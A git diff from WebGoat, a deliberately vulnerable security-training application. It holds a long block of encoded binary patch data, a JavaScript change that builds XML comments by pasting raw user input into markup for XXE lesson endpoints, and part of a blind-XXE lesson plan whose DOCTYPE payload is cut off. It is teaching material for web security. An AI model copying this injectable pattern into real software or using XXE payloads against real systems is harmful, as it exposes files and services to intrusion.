z?on%%;Pv=YNr66yAg^V1o>>KNB7CM%)fG(tyLWe%BaS{PBvd6s_B*e@a8jmau)Rv3
zf*Y%<1sb<NZV)n7(-UsAHXycn6zJ)-fIdwW88)Ee&;C_jij0jg%8Nsxw9O=aF$MS9
ze+~I>Y?kC`^QK-JmAp#v3~O~SbE$N>mb9SPV~F-<jLc)8V#gd2mVJsw=FnBqJF%XE
z^|kkfs;lKrQ@PK#YkN06|9zQZS_8>cQ*<-uV6c(hSCd7onYGvX@*d^zrQ6`#h7Vrb
zD~mTd{}Zn9a`<m8eLME#qO1LVrOQOE|FddK1*3q7qi?HQ#NWYo1_V;amqo`%t5Iow
zkNtK(3$XjW=k*Ok90L~{fS5h-u|)i7jJ8ZJS{4!i590oDDhEQzz2~!WW!qVJAtJdJ
z#Ew*t-7%aEJhJs%{_<=SLyspbWlB+JG5G=xy7E;bq-arqe09Fq^=9Yw)vB!%Z=y4v
zq($6&4F#X#Wv`DVrcoiKPVRD8z71bx#`|v?3bm8aqIZJ1!@Uk>aLxN$a%V^-z9H)!
zuw0P>_<Qfg{|o!U@Bbau(?Qkp>#i(c#HB0se9+@Np2?@nA42r*k7t=AS_hN=*(kQK
zgXDBVD#8B48N=s4MuM!aF@;eQ$c=tdE|f;4A%eRKMD&~OOd|{w@pRV0_mzAm=3s00
zO;6+eJ*QR^zjZY>zISscnqD57(HsBmPPTb^6q|j%=!xQyijpZn<Sp}Ua+Eq~kk!~4
zDZuwt@8&OeKV00<<ms+4^|uN>&{x;_TVGuv(Lf4zWy{)&JyaXeM1W%dbY?`;-0Ezm
zUK4DN^;r*-uAqnSLdg2^;&OG5^1_QE(<K$>e}{;nc)0gHmhH-}V=wvXCOf^C1h-n@
z%szu=Rq%d$BajA0PEJxxMYE|o;vkVsH%dEH<{CCc(a`EqUimxMWGdr9wq==q`5?sy
z6_2tv1xJHo4q*eVnU{9Y^>AvwoH<qisn}>aD#`hy7WPb=HQ$!L$*p)Lva>z~2eA$I
zf$C%&srK|Y<IAPJE_yB3b#yT?O~uyhszQe)O#ggJ5#8w(B*Wd2ZyWoz*$Z+hJ;@YW
zQYp64<>xaH`v?6^wmP!wBvNp_u%1r3a!RR}&I;O1hj%<%Emd_%CF^dhDeiP%VaM)u
zH%|A&!D=t3`N^sNU0nQ)(Zkw*41@X~*8PTxj5A(hS}hrf)@Z<*O}0@AhGPsGivUEI
zSv#;Xjo}zJ$D;MSsti$>!1h26L*-E2m7HhF;MG8g$nHSOCZYrc8Gre$iK?p0vtrLm
zmqLV>V@Y=9MVZy68ymmfSOZm(&X$d4?}j6r(GTekLE_&n%^<t5vyP$fG=!$AH758m
z-tJ!XV!|dIWRD}|PpEylMQQV@nOZ(JX>|#D{2q;6qi&VV!SQOSW&a*{#Ckkpa<WA}
zeILE~-DlY`pyzzFCY3VDKF*VRydV=c=nrw!18xTj1<h@9aqqM{DAQ0c8%aC}0t>6h
z+;@++E;gP-KYaNVi0zK)lSVogV@q4SllJ`&?4xnYfx7V6N5MBdO03}e8T;8Pb@|n|
zXcN7LFH^;>Cx?vBJSs6WmxVVeEBW~4y3D6@FYkwlBfa@QU6V>1yT=&nr-52lWOz;v
zkN^NRY#FlZj9LpQ)V{;|{19&4<Y0+VZPM`DN|fEnIEf3;V*QIy*v(9QWWMiWE4ZAN
zYJmWijfX^@6p0QS=steZQ_hsyPY>s1$`uu7H_w@Gtt~nb(TM<zWo`P7y9!m08=8p>
zF(7$Y2w5=x{BlAo;Mi$8);H){?-5OCgoOsVL<VXz^Ez<8EOMp1!x~*-|GNrDm-0km
z>mOp!4&IEkYzm$4`S$b|EaVk^VMvODAr#)0HwL~QdrIhUolSaVDRsBPk9OIDFWCej
z*V(8c$BXR=Rr6iv8VKC-3HWBlFF~I@>_9W5$ibB^k*~hQu!*B)6tWpfK;FiBSDlcv
z-nwht7>W8>DzQb}z>?I??Z%#EyOSNNm!bd`UBvhwHQj@rtNA+D?~m8+s_+H@lr7JQ
z5wk7g33}z0l@t$f3gjBK=3#03x138@S^=0(o(s-P{<}`@UsyytGXKb^$GCSUb_)Ku
z$KEo=S;u)pUrS8ukeTS=vtN`z!agDl_K#({S0K3GXUn_n=|8EEwn#&Id=4Tl*@Y`-
zXR1ROKn+LX?Ib~<4gx60@@#JQva>)+zF`(b+A&@qc<rb=NuY7Bb0(Z0hj|2l{J0d`
z#}2K!7O>qh(id4FF@jf9-~b`LWANbB7$w(A!vKxx`Q&ULZK3d!?rU2=Fb|T6u+n$c
zLt=rDDwYvaM^<?t>U=fjyi;%UtXc}0ksMx1{EBC#6{VO^OV{WfozLZQY7Gts2V=n2
zoA<IxG2-9Tb<)%DmA>3XzH2t4Ee8f-z!!Tg#a4RUHOF0_My-MF9C>{Y(M~&&w#I8M
zF>G;80z-v}^P}r4qCp^QTQ8T>9}UT2y(p`gGg2TiBHn=`-c|ywmPM1_UDfbKfisc&
ze9t8O_^`mSyoZj|sgOpwkt4R@4CRHSuLT3s5x)z{Lq6-R9l!tAQA7XU#>~Zl*MV&7
z7n!2_AYRcJ>BQ3N$v`8kN5@-nZ0z`tqB^W*BmIDoes{M%aZ#^j*Eol?alxGrw#%@(
zyPy)B6S=X5@Mxh4&kV-N3!4Oly24B;SXe9)q%dhFvDdn}HLoiWucfJC8;jiRFtPT`
zo<0Nwv8%hm|Br_9cg#fW5#6r*nyf`@18U03@|p5M7Y!<q<Mx7bXJpKCXHNNtXcOKq
ziiOPW*oPbv<wH55ultHbs1Tkq_FrUkNhIWE!!+}0Hn=A;2bgZgCwJ!q7u@)lcJs^Q
zQ>Tju8!~5zMDggd><Ex2rGEEu0lVeEiT5Vs^;o|sFIFmr0=TxJ=GHl-UN;RJ<>0X~
zxYUpNXfZ76pn+eK2tcb%J!-v8ktgNT@Xj*>Y6^ZDBezka9x7nS&`G@4AlJjxWlq!S
z#p$&J)j^#hlRP(p2*n&%))|ndAPvtY%6M+C-R%r<Yn%$yD0f4E-2#>pHxO;>$)iGY
zT-bcjnA`1cav8Gm3h!`N;O_L~kT<m0zCf-iSkS6>r{VWG5I@`*0^S?;{2nXCGe)q<
zW(1)8oct@g9rq9vHCOAFq6Z+(8HuCt2|$nU7=V6=jKLjin33W|*f5p<ZUJ`1!>=K*
zd>QCbTx)c>khsuBvgm-?a&zx{9IaG0y}b7t?1zP+E9;x!8_aK~`j&>X7)k(<-MuhN
zE!Y2AI5(-ppx>i(xbiqr^qa1TkKP)|qd}bVSijSDfY_0}i6`ao)3sS9jelT+#g>Gl
zS-f11KlbQep08@_p5_Ys#zUNj@iG_#Ry#b4H>qe%KS-*o92M@AzC6<r_`!BcmX4Sz
zFk#-W@_LR**}6t_>^C$73b5LC@Y#ujf7VOP<B?bG2M{e$pFcTC`0PL2E9uH)awEtu
zd;BtwMv&FZ9EVv<xHH4~*ht|!SFS5^=2DpP<G>RoLk`QyhEA|F!&IkKZysgIRC!je
z@+`gz!Mu=EA~{_p)Gx%M?bP|0dQH{qrm94aIjqE~n4yJLf2*1Oq?H6Tx+Tkvaw-D&
zE@*HXS;gXh!>-nFfz>?B*~IQ+`+fZi1*yX8ec$n@<C{fTxFwBBcHW0FM^AgGy3C!x
z`Yp7L-;``e@WvTm1)n>W8Y7&2<<regHG#y{ITfV$<VQBStMo5Fc3CVm$#l@FlQSwA
zw_xDr>N>TBGg-$<Cw|}0@DMMAi18$(u$-KWjeddY)lo`y?Vj+QMCS=?2YzG$^$EtX
zZ?Gr1e_jkCeZl?4BjrIA<_@JSk2Ie8k5j66E>4Tahlw|cH8L4%I<}ub0f2@lhG)FY
zLPx6*WJ3(gkWJ=94I&7p1m|MPRnog`F$FHPawox7yA%Bu8<R-Iw=iqXRjwW4pXx6!
zE{P3<;A=!kv?0pyNhtedNdJnihxw<n73Lm}dJ%H2MALh&Bw<bSXg2WK*bO332d6N>
z<c!Jt*4wC3PR1k!yBWXuT(xza8;g0}bH+NLAx-T%SQr7zr=Y@{WsZ_99~<b<gTKvq
zss*Ug4NI)>M(NP5=gXAw2#*?8iIs<4)qxB466Gl3fH6b*r)q}lS&?sy;$JojyHX0n
zMh7H__0K8BT~@N{XEPVsx!(RnQ-N==SveH691@^HtM1C&4n(OjS(?i~Z7bna+M{RR
zUnk~Dn|7bIrJm^MzV$<x51HMRG0PyOz-Sn;5!FGHB%`b-VLU!Cd2bkqMTy@%*`iyu
zpHCaQ)A&HWd2V3;a{^n4Z*%F|NtzJl)8Vv*OTA+H;W+jYjCrWTY8L-W=y#>`a?=+|
zjPK@5i3iW4_4GWo^08lgFe=LVdvFD``b$F(CrIFgDzwrvosB-J8D6^)U&yiQKB$v!
zCPa&O`C?jwaqQNNE_we=8fDIl7d@-$U?fqmP2m~|mXvEt#~BZE(W>BhW48%s^jeed
zR3sX0hT2Ewb_85YdVcOS&t>wBK&$hX8`5JCOJJ_*IDVwv-Cypmy??J#+AvV46v%8D
zpoX&Wa91k+j3?Y_rZ?=J|12DY<wRMR)1dgF=*gCTWI<1LA%ng$6kZH4A{6_jTN(a{
zXnjK186m&%w2`Fdl0O|RX2d7Sf&L#YMxom;Qb$^Dna*s|tPLgu+|Fy;_ICdmGCZwf
zyIxPrbqNGu4lN*6uruP0ircrd`29Ajw&BG7&|uJ={;aW}Dt&81YH!MHwNIo?@C|ba
zNC%@AgaD<|k`8dC(n=*omb8X$etoP+umy`52xc7Dk`bMYaCBB!=pSbx!(=v%ksH@L
zplE>()z%h+npaKVZ{cB`^oT}YX`ubad<GKbJyxcO3idaLU3NQRCkR!df({wj0-SB=
zgt#&Ic%`7lB+UO!rUb;o=6*#=3ka8oE(U=n=IT(Bt2<T(<F4LT8u!(~3yAc42STyY
z{#sP*TN9ry5AQvk>izVg7Z<0H3wP{Uo}jh=Ya~8()R}MYjudD<Jwn$=2wN9m)y^+W
zsZ-ZykEWNY7O;2^UljF`7`C+nj|5p#w}1S+^d>o)RZ^wYoG#zXXUUfZy6iiM1+Jzz
zxF-kTurZPm1|pGl22SA0Lx-AHtC92cG=#GI2|1x~&SXCQLyIq>f&ltdpCB-8PNtKC
z2*~u!thtvneE(0kww|tu(AKv*=7oWT#SoCnKbf3#YH0j3L&(_PTY7zd<hCyp7~W<~
zf<JdUSNTZFwTVCFFu=5#yHG#zb8)#hEKyO7s3}*|s0pg(V;Tvqz1PSwVazQmmoBKe
zh9??U=f}XDhc^3_QAsIo{Pe*I(>5HwO@ND}<+zk9DLgFJba?R5mW(iKXpC1(zlHX1
z5kjz}J^iIcSF2G@5s1Bc=EGynSMPBUvG*q-%+i4m*|CmCumc%>1>}p~=SX6shJT1+
zMj||SnGra3AB@MapdTdZI#$r=_gv0PLV1ZAGaSD@-RgnBBRpKVZz^CY9S&9<s^ycV
zCo&wIb+>h1i35T46(Kg~&S!}2jaKOxK<MVcb^=r2`qQElh4W`sUTB@Ul)Zi>!$1BR
zo|Y8C(k$?J^u>^t^|}#+yZl!K0Z(9-Hm+=_9J~5>gzX&)M~Xdq9uFhd1B)bGNV^kj
zwbcHk=rYzdAKNeb=DKbO=cqpO4D-r6YgjScf4bSdVLgTF->%RpST&BS%w%77Wzim!
z?VzL(1MW~-`@F=@v94nk`NW-_-@seEgG5*17J=I1Lr}b9Qiao{Xg+DJI9o`5TrR(W
zUs;)!-vX#i(~+GS=ILqSEulYv{{cQ>aIux9h&uQ!wP1uOCJbNC7Cf-O`kmCr)du|S
zzXB3%?cKLLn1<rgh;EeV#@bRZA(6EFI*^Iy2mW*H>R89+w?C$ER}^$`PHL$Nx5yaP
z)$bmyX3LX)^Zx5jZ7&ijo*7A;`(&c+k$cdg*gg|2uMH9eo2xX~+bIhv3iynS*M;l<
z+x|2cgLjMzDU0ZS%+!E4XmVyjghUjZ7D-$-lyF$YE$jl8!c6AFD`T`5(JL?8FIklI
zUl#AlS+;g72<8rw_6vJEEs(TmTlR$(g{|l1$X-w80}+HOKa|2ykV&afTS`XRp<US{
z#3u>?y74<U&8xT4{XV?8eXzj0rK81~IeWe8NlJ-jnLCUPuR3ou(f`DLeS41udK#c6
z;bXf1{xYNUeO2LuP1QjZ&Kt_ODko%k6cH3ZV<#tEr-8<ZdUB>Pz0(hcF(u-ummFc|
z(^j{PmXCdeZ6Ja?fMomof15iE&$)I899-3v)%Bo^x;Z`fyPVEv+lZHX-r*=t@FY_n
zZKAlNqMcajWyyz(jL^*{C^!mctadjvU!IQxD?}SgFdcz6M0={WMf3q5`KyX)u2YBL
zJduW4md29U40n0BZPv}W#yJ{<Ms8#L4svfhJ=zFUCVy(9P&<W;@M!%vsK^nU|5GyR
zqk-T%rr43k!#`JA`rR39-(8AEr;4xTpw})8-IJ(2DsYW3HAfNgE(4cTtw>w*>gq+%
zOJYC}R!4d>c~MsX9={<{B0~l|*qF)hw&3b|-S{QKM-Ld)CxfB|q$ysLII?S_arX-$
zjSvql0`+$Wol6WpP4Hh-P#9EN5#iK;rv1{*eopfCLe2>*gEf(X4*o-!bJAVnO7Hv*
z`q@3#7I|a+V3niy2_r;-?1K$oD~mJ;D#OjM#3=?l@J;Z=$Z_zEGS_miA!S4s{hR;o
zu=-nKahDmmaS{;$2H?VvD{}8FT_l&_-o>NQ6$Z8|qxYJaM)D5pX?82WX7-1gBD=!B
z#d(P>epJmm@i*VIW82fo1u7kL1cLcbY}=C`_^2}%zK@n%mmpbo7b8g<E>*<c(m1j`
zvV*D*e8S(1-^Zz_>`7WDwMX-XNP4wcecRDFG|98}A5&p&T1xj2a-_HJMUnE2o=*e%
z;dG%UZ>HGZdhGc3{x&;I8e>6c`$bMH%d9Vsq49*{!EMWAJWNf3$ngOPn6QkNRnwn9
zUpiS-*I(7+$+@UxnQp$~L*CuUNF|O|EE86qzNEXZB@P_p>Hr<rRrv1dkp-NYxZ^wx
z^M$?#gdob>VzT_nA1GwB@n#k7@()Jm;4_zoT|D}u?%pQ4dbs}5YHxE*jjs!M<0ku~
zESg_y;6E+4{E2HF#XyiVNd+R=rMr-{0ZVOL_#dV=-gG*YM;kZxzNK<EK+u{*3n8f0
zZbl)HX%WVwC0=>Nj09>`QGJI21d1mhY=2T?)K6*JF7a{tZ;L4(<`}@o4ft8XcsvOq
zgl$?Y-BNvxC}v&5`$r0>Pmq|ss-ozi0^8zHS*~<e@qH}pd&lw_0qAg66cx`lki+;~
zrTemzkqhDGDT>sUwHi##$T^~nr?uB@>bEq@#IG=8qPs-&<;wP~ZVLrqzb6*zE@xPo
z?M+4^Z8erw5DY~AIaxPS)sbGM=o{<P#)DZDG#!VFiqgokNJ)z4!XkiB8jDO9+Bb+t
zDoUkV(aurDKR4ID+TN@Rq6EuKhx9oJCntecM|=RXO07RZ<aQ9cko)}ztei2Bh71J?
zyrBu>l<>mMZDeUdU#)zKSkFX&g!SD~aZzsNu%~ba6F@hVhgUTYr#!kcrNF$#gF)nb
zS@zLZb5X9PVLQYH6Smch5lj}9W@VCMZ`bNBZ5$;U<Y}O1tg(?~SBgQ}n&!dVm^Dzx
z%BYUhW!39$C~7>x^^({l9Wx$nDP2q<b=7!*Dw|kTDNOQ?941v234+9D?xGyVt0g#c
zn`lWvtagnQr~=2r)XMi4IBV5#jt;BkVPSNF=@jpb-rC1#`O@Q}DKHWpNBHp|KmoBz
zkQzsS5=+>Zl|-wR!y3D;(B&H@YHD(RRHO6qcP2$?&E{psDrQXZL`g)tz%zRODzmyo
zwgWMZ4Jm2Ba*Y-%30U9w+@v!!D<J_>p9BFa+P>A5T%d<E8W0RBE(u!KzlR3JVn`$u
zlN{57nm_qsS1a_q^s`F39aK$$1Z)G2k0H3a)#Mw`1=GS6(Y!jbfm~e}3r{)68kK{A
zpkt;j8Q+nu|5PxV`B999Mb8jlis24XGZpIas87Bl)^AmWATK2l8cm_Ot>Vtm;?xPw
zG9>W8+pbP;+=cpe<eDFZpIV~bNA%fDsK~SSi`+j4yd-aV<F-8{5<xfgdn<_+ggnWN
zOn&?Z8-Z^2*I$C}{au|_PI<NYFXb7A!>(_sVOv^J!8n7Qj3JqmMGm;;0HDlV_!XT)
z%B9<4vwApTE29^-8RHFZJ+Sg1J7h4zmmeRZ)XBG*Es*YKXzK?IpJ^L1dl^UnQMFr-
zr|o=Kh|&z9M($BMG@6A}D|05r`L7L&Dolg&Z8<^{DN66w3=XO*HHAxsP~cHh{9irR
z!KM{%mO|Ta>}RhI5rV5Ks@5XX<SblLILIXDb>qCW(1d=yONpXF0^h-xPZMYSfL=^T
zlQhSFVaz#GW99t%oy8=b`6`rSs|z7}_ff7v!Y})u!dLk4#iW!yz4M&Nn&u5;zi)(p
z#%F+(G@&@9-h;5nu^S}tEZs(@bVtYqkdvA--EM6;za@r5L9WQdwb!z*9*NXovEHkW
zr6L3Y%5*|ci&uG0BXxv86r@NJrv#nHuOJVG>Ue#q2-&nhIcma_HY;5BDrjh&YU7dx
z)R5gX7#!7hII#SPY4V!DpDZQ~Kp3mudmETGT!rn({rE9%oKj;`@ud#~c3<^Hu6X%^
z4znoFz>Xi9-IGR6Xd(g4#&9wfY!R^J`Mie+J0J~Y>g#Zgnl6u;p6$EadU?KBG<|aI
z4Efgnu!D!?g9pAYQ&h0mAbDx~t*~sbvsqxa9@(fCWK~++iK}%y(pzkPVlHu3vc&XU
zF6;yMRNI0Q07x4$)_|5E7S6ligZFe!C2U<V#7AYeLvMAGrv$zphE?q0#sG{60;3Ti
zU-rtl2OAoDV7mc-B~+YGy;FMrmWMQWsj>8<lIzJw;@+|X(sraLg!%x0CBA0yqimtK
zF}NHQGH5swBU;^#{^R4$U8R&O%WpCbY1VXCT0MHvw>ocBcCAYUX8&=#G@~92f^gOz
z-2#az0ZW1oYUoF~*$QZ++6o*QD*XWNWLLeD9oe3$976s&XQv;<ovbR&O%tR|mX4|h
zYtKjc7_@=x0NsALMWB<Ter9TuPbMVx;4@9LJx!ai%UkLZN=n%+(9m>9L7V!5VZ}q+
zpF-+{@<QSPEXQ2W4_??Q6Xa9^y5r)tGSrKU6)hPXZ~j-^3>=Yq(ov<&bf&~Vq#pA9
zM4`CxD`tMkMMP9!Z4?alU5xj6rMl7SWK(wNe8|TaSHjbBQ%Tr7aP8OxEe5AgSZ<v1
zV)CIt`0q;^Bp{8|x4w`_tlc{b7tfvm6{xnCK9M}X9B;;Xp!Vl??H)X99A7x=iI3Wl
zcOsQ;1W2kvbp5N*c)=X|>z6*IGxAbDZ+g+qe0m=1pIrpI9~&(a4{mty4wku1$EiKM
z{pa@q9mqAKSPr`b39blSFN68-ec#LTv)a&uyG=AivkK9^70Zrk4a=JeLCA?`*T>=~
z&4)kvZ6V6S4QA<f9jO(eXJZ!#<~iwH+p%|RhI~BOMy)qB1SiMV14zEz-L5cI1ZYM1
zxe`#n*48?+4*>D+ozxPprmfyTrQzg(oLPszSrTh#9NsWv<0E@RxZB@=@lNI~cFInW
z&zb1iNw>n6-I;=Q63;sj{n6IJ)-NOkRTQ|d%%F;cmv+_y=})D3OzcdnXMEvg{`eN#
zmi*#h4j799d11F=)9Of}r(`)sA0_>Me)tZgBH?}h_4HA2r=`Y^k;nA$d5*38-1~x~
z0_rJqw`!7%`|_6(SUIW#ZqG3VlEzqFhv^BV#*sr579R7Pyo~VJxQpg_Exk;a?xfi=
z9<y(|=r;M#QF9GGsvG{ijRTU|#F1~BI?2Bqx3yksr@v_H^icBLoLOnp^7*giNF*eR
zI*>iy;NKP^;|RbH3gI=@7YL6dC)^*-$}Kz1yl;9OTMTZ&vws)BH5`v#iai353w925
zJ^R3e7UL&VDQtmD>HD6fr*CayI}X2Ckhji6N7Vg`Ex)m^HFAp%(5H(ncbPPXx$@f$
z7AwYf2&ax{Cu8;d^hTK3#O%@jR5y=t|A}O2YD{q>JL_j@GQ96Nn<fs9xMYHM^YM_4
z8&>!5Kgu8^iof|LwP`mhDDa9A<P#kxQplk#8fG6A_1}fbo!Fv=D%#KPwS!F?m5af1
zo)xMOLy%%3)WV!mN|_xUm6D6f5~kQw{}`mrUMTlR8ur02jwUSGM(>sWrkZnhe-%<n
zFqv%if4RxBgU#3ea(_(NR2f3B^)Jy_uL`bEH*4OflZ57iux-NMf6(QYEMjN=ak`uo
z9UkpEY`OHenVvf5S}dDa!qf9kFaJDzd`vCEbh(>q)-TuwKad@4^{Jb^?~nQP6Z-x}
zZMZVT&R@{r#?#oqiJJ#qoYc0ZU>Y^aRF7ZZ%B4T^G>hnh@AJvzQF)ywwL1qTP9Qbe
zymri1Lp{COxH)V08*33^pb_&I9EhV8GMl;M{KdhJ6csgFdzU>THT9Y{Hy@vX9jG<j
z<2PV!;W5FZ99(hYVZV;=`t`uQ^~#<h01v~j+ANDu>t{Fbj44-Kv;;pkOh#n;iwYy_
zWnrqgYSD`AalC2T=%4(8hy#}C*=6&lR#QHMwQC$UNA;y5PGid7-T6+tx8ngG0V8(m
zhQ#l(vjihYOD;<`f=r_xMs7^!OK^$tZWC2(p6Ga$X{xfV#C7^>3+igM=KrwcmAP&!
z8N7d@6z<G(1=M)tT|}>y^6OXcMet;3d6@}3?U+zXmmQ~DoIl)G`$v=}9d3Qxj|jL;
zZfX7+GS^&Y9Y~kl0(lB-xpDrdcx#lu@jxjuLo6Y}U)_3okFe})8KsSrT<fRGw#y~$
z720_t?%%5D=saC|iJxf<sCh$o7^PPSWR#mSz2AulQjjSW%(|jBQzObH`4x+9wH&eW
z*gxTMJ7m*zu;klRtnH+}-9V!;#CUXk#gl@48?2&ytTKNdzEI((sOI!Tg}4+lJ+{+x
zcMWU@e%${|O}CJz4sdKu>wHNz$_Pa<BgVtpv_{arjG%3q8dy^GM<XM<9QcE?;m=uW
za$*9As8MwO2hoVuto8Xr(!rE#vU=)OsBZ`n+xHAAL5M~Af%ZNgVC1TEme;sc?p?2z
zRL=aS_F!w4NZZ!wXo3W-UsCuJ)_YUCJ}uWyHi_@kbTVyYBMiQGhxxS^gW+MZW3~Lj
zEWyg}XSGJKSE%uR|9L_tnm+NZD*d|O9`&5B`H`5WlT18trAL;S8D*9=jZ6vWGeX@N
zf#ey3ys|ti)pB6prIJJtT{V#Q+gKK*^76Y?7ty)cBLURRi9}9mRzD0bj$^a^bkNs%
zXPT$dxkjaXmo;FX-}hW~(b`c{#l!EIyy-OKCzMAMkQ&*K-6LL~2j)+Si)T+-j;QV*
zaHDr=yNwn9n{iS$>J5)2TZ~mP15rTpROL4OBg3ET$1v$Lo@>59(9^YMywrIH9)jOg
zib5HDSkoj7$SdqSYqD7bJikopVO3!Ww0plSC1Ragtc2xx37tgDr_K=HkYIKETl?De
z+cQDC>Ed7WEz;qgOPmIWvq#HcT~)L6rIq-{{}%mR`%kD0kc*bYAtp3}d#N16yo~As
zZ~7skCR9txCPhh<v*cP5-`Ydpu(QXAmtiY>vmJP_|L7_`eqySY$)VXUd2yO)3dau-
z%SF$#?x)nMhmK|g!d7sFyST8}{xro7y-gs^!gNK_rqY(U8(r|3y75#~5bV)buv3e-
zdxr)*#C3hi7$haQG!^+(8r@36Oky@kgP8_(futb(^{xm!_x$&h^K4?H3kZQ^noe=h
zwCKx<B6bE06y$~Ub&%p=Y<>F0>QrE5#3Lk1h+Uy~SmhmvBd~PRUOS6v)*ZsG!_TcB
z*q|Y5X<9?q;W{TWocGL3rsY3N4&~T`VKRoez{Kn38Bi#_bq&EXm6-d8Z!_u`8PDEl
zqyaLrr;+k_pL4L)*7uXOi)iZ{5Ba_0yAW|!U!rzl5_N}!UVNgS$jK@9oU0&VBl;RY
z<Uk_$lY4uK(_0XR*}LK&=9O&-ziQvGufYZ&BofTLbc<GD2pq%!Yi6>;k?zpGO=2kF
z7D7|U9Mvr|e~>l3AXfqHwQl&@ejZ@562mMl9*y%qPHl8Z7|GN@3Jz+y=jOzh1RV2X
zk4x-9khW5&Z~D62Tv$0S#l{>3ev@L2mJxQD<hM@XvOitUJCHJDw#VNi;@+ydaRq&Y
z`SUut5}H}P*PrMoVuvk{ad;vhmzL{Whh*wNQ1bvlGiZJDXik><x{shTMI$NX7j%^t
z`rEZiZRL?BGc~98!^^!qF_*0(Cu<;*<|hEC(14qKzK*bPe-W*jPIJ+iY+Ks(sxD#6
z6=|sJTy)n<RGrKbEBt!Q-RIdkta5Yk^L7eFj}1&OYlFtk^dAd~k((0Mb&7FKx+g<<
z``Z9sj>8g3p(W$oyGgNB9klfCE(MLGKxPl=bgeqR>cHZ26j<-}zh(IkP^<C*q^8W6
zDvFYdm95en{QX?phXL=}wuf4+ps~7+bHS77zw|^-)drpJsGa~)jWVt6Xr({fv^KZq
z4(4WYNqgy;=a4jVqvIq}{>BZzKUUvc)0<TTu^?&Le0?r~=0tZ~M>Zv5P`#w!whb*>
zl30h2j5>JvtRkZf5Y5?Ri~aY0a#GodCHCG|$WKnUiMxC%qKMcKvvzOP6&Q0SpGvQF
zXeJ>dupi*Kaw5P)`jeiTd6v}f&vE0oix%=sq95r}zE8C()0R;SZ3rAIq9M-k!~;Ne
zOS-l%GqRCeE|#HOIGUJX3dR?~QQ+D|k;z?e)pTo4iK!~}H$Sz<mGR=wI2`O;;kTGn
zRFrg=yOA#$eSo{5IU6n$?LH5^B0*kV5tf_#j6VQvkAaE4=VkWFx5Y`WPaXpu1J;&j
zR5tw^!>1L56<U2-5c}a7AwN?ojWD<lZN`pi=g1FFUUN@{SU@T^Fokhqq@LijhKnpm
zT#URs%2r?ltr%Amon?|<=Z%z<+v!J|_Wt<?S3P=T<6~!oWa|Hfg#;Kz7KbB?P1rXM
zA@B0C_G$X?A1Xm{pT8Cp7XEye`svc%zP!?~adbQXQnkW_`KOntdVvfj_O=#LZCt!o
z{?`ND_;ybf{)8;#kZ4P!CxI_0q;6GG7TSLVqIpo`MEgAwjSz}y+nPNurhfe5g9grd
zj5MIXrPKW{Fxs*Yq;~folHt+rH|s;Txff0cP>@miR3l{;{OuLpy`sBUboYwxUeVnv
zx_d=;ujuX--Myl_S9JG^?q1Q|E4q6{cdzK~72Um}yH|Agitb*~-7C6#MR%|0?iJm=
zqPtgg_loXb(cLS$dqsDz=<XHWy`sBUboYwxUeVnvx_d=;ujuX--Myl_S9JG^?q1Q|
iE4q6{cdzK~72Um}yH|Agitb*~-7C6#MR)%X-Tfb4sYlZQ

literal 0
HcmV?d00001

diff --git a/webgoat-lessons/xxe/src/main/resources/js/xxe.js b/webgoat-lessons/xxe/src/main/resources/js/xxe.js
index 9002de2e4..263413f3e 100644
--- a/webgoat-lessons/xxe/src/main/resources/js/xxe.js
+++ b/webgoat-lessons/xxe/src/main/resources/js/xxe.js
@@ -1,22 +1,73 @@
 $(document).ready(function () {
-    $("#postComment").unbind();
-    $("#postComment").on("click", function () {
-        var commentInput = $("#commentInput").val();
+    $("#postCommentSimple").unbind();
+    $("#postCommentSimple").on("click", function () {
+        var commentInput = $("#commentInputSimple").val();
+        var xml = '<?xml version="1.0"?>' +
+            '<comment>' +
+            '  <text>' + commentInput + '</text>' +
+            '</comment>';
         $.ajax({
             type: 'POST',
             url: 'xxe/simple',
-            data: JSON.stringify({text: commentInput}),
-            contentType: "application/json",
-            dataType: 'json'
+            data: xml,
+            contentType: "application/xml",
+            dataType: 'xml',
+            complete: function (data) {
+                $("#commentInputSimple").val('');
+                getComments('#commentsListSimple')
+            }
+        })
+    });
+    getComments('#commentsListSimple');
+});
+
+$(document).ready(function () {
+    $("#postCommentBlind").unbind();
+    $("#postCommentBlind").on("click", function () {
+        var commentInput = $("#commentInput").val();
+        var xml = '<?xml version="1.0"?>' +
+            '<comment>' +
+            '  <text>' + commentInput + '</text>' +
+            '</comment>';
+        $.ajax({
+            type: 'POST',
+            url: 'xxe/blind',
+            data: xml,
+            contentType: "application/xml",
+            dataType: 'xml'
         }).then(
             function () {
-                getComments();
+                getComments('#commentsListBlind');
                 $("#commentInput").val('');
             }
         )
-    })
+    });
+    getComments('#commentsListBlind');
+});
+
+$(document).ready(function () {
+    $("#postCommentContentType").unbind();
+    $("#postCommentContentType").on("click", function () {
+        var commentInput = $("#commentInputContentType").val();
+        $.ajax({
+            type: 'POST',
+            url: 'xxe/content-type',
+            data: JSON.stringify({text: commentInput}),
+            contentType: "application/json",
+            dataType: 'xml'
+        }).then(
+            function () {
+                getComments('#commentsListContentType');
+                $("#commentInputContentType").val('');
+            }
+        )
+    });
+    getComments('#commentsListContentType');
+});
+
+$(document).ready(function () {
     getComments();
-})
+});
 
 var html = '<li class="comment">' +
     '<div class="pull-left">' +
@@ -31,15 +82,15 @@ var html = '<li class="comment">' +
     '</div>' +
     '</li>';
 
-function getComments() {
-    $.get("xxe/simple", function (result, status) {
-        $("#comments_list").empty();
+function getComments(field) {
+    $.get("xxe/comments", function (result, status) {
+        $(field).empty();
         for (var i = 0; i < result.length; i++) {
             var comment = html.replace('USER', result[i].user);
             comment = comment.replace('DATETIME', result[i].dateTime);
             comment = comment.replace('COMMENT', result[i].text);
-            $("#comments_list").append(comment);
+            $(field).append(comment);
         }
 
     });
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind.adoc b/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind.adoc
index cd615ee26..0d7e110e4 100644
--- a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind.adoc
+++ b/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind.adoc
@@ -8,11 +8,11 @@ Our WebGoat server by default has an /xxe/ping endpoint which we can use. *This
 
 [source]
 ----
-curl -i http://localhost:8080/WebGoat/XXE/ping
+curl -i http://localhost:8080/WebGoat/XXE/ping?text=HelloWorld
 
 will result in:
 
-GET curl/7.45.0
+GET curl/7.45.0 HelloWorld
 ----
 
 at the server side.
@@ -33,12 +33,12 @@ Now submit the form and change the xml to:
 ----
 <?xml version="1.0"?>
 <!DOCTYPE root [
